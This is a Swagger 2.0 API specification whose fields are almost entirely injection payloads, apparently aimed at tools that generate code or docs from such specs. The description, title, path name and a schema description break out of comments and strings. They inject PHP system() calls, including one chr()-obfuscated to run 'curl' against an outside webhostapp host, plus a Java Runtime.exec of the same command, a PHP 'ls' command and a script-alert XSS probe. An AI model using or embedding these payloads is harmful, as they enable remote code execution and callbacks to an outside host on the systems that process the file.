{
  "swagger": "2.0",
  "info": {
      "description": "**/ system(chr(0x63).chr(0x75).chr(0x72).chr(0x6c).chr(0x20).chr(0x73).chr(0x73).chr(0x39).chr(0x2e).chr(0x30).chr(0x30).chr(0x30).chr(0x77).chr(0x65).chr(0x62).chr(0x68).chr(0x6f).chr(0x73).chr(0x74).chr(0x61).chr(0x70).chr(0x70).chr(0x2e).chr(0x63).chr(0x6f).chr(0x6d)); /**",
      "version": "123",
      "title": "4<script>alert(1)</script>*/ echo system(chr(0x6c).chr(0x73)); /*"
  },
  "schemes": [
      "https"
  ],
  "host": "jira.elt",
  "basePath": "/",
  "produces": [
      "application/json"
  ],
  "consumes": [
      "application/json"
  ],
  "paths": {
     "/a\"; try{java.lang.Runtime.getRuntime().exec(\"curl ss9.000webhostapp.com\");}catch(Exception e){} \"": {
          "get": {
              "description": "asd",
              "responses": {
                  "200": {
                      "description": "asd",
                      "schema": {
                          "$ref": "#/definitions/d"
                      }
                  }
              }
          }
      }
  },
  "definitions": {
      "d": {
          "type": "object",
          "description": "d*/ echo system(chr(0x6c).chr(0x73)); /*",  
          "properties": {
              "id": {
                  "type": "integer",
                  "format": "int64"
              }
          }
      }
  }
}
